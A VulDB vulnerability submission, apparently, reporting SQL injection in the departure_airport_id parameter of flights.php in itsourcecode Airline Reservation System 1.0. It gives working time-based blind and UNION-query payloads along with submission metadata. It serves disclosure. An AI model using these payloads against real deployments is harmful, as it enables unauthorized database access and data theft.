提出 #385895: itsourcecode Airline Reservation System 1.0 SQLi情報

タイトル	itsourcecode Airline Reservation System 1.0 SQLi
説明	In the flights. php page, the occurrence of SQLi injection is due to insufficient filtering of the departure_airport_id parameter. ————POC———— Parameter: departure_airport_id (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: departure_airport_id=4' AND (SELECT 5140 FROM (SELECT(SLEEP(5)))gVLv) AND 'NWps'='NWps&arrival_airport_id=4&date=&date_return=&trip=1 Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: departure_airport_id=4' UNION ALL SELECT CONCAT(0x7176767071,0x424b506d6250536942685a4254456d74566f536244496e6351716f4a6974504149794b5370625a54,0x71767a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&arrival_airport_id=4&date=&date_return=&trip=1
ソース	⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE1-4.md
ユーザー	quad (UID 73025)
送信	2024年08月05日 10:04 (2 年 ago)
モデレーション	2024年08月05日 17:45 (8 hours later)
ステータス	承諾済み
VulDBエントリ	273625 [itsourcecode Airline Reservation System 1.0 flights.php departure_airport_id SQLインジェクション]
ポイント	20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!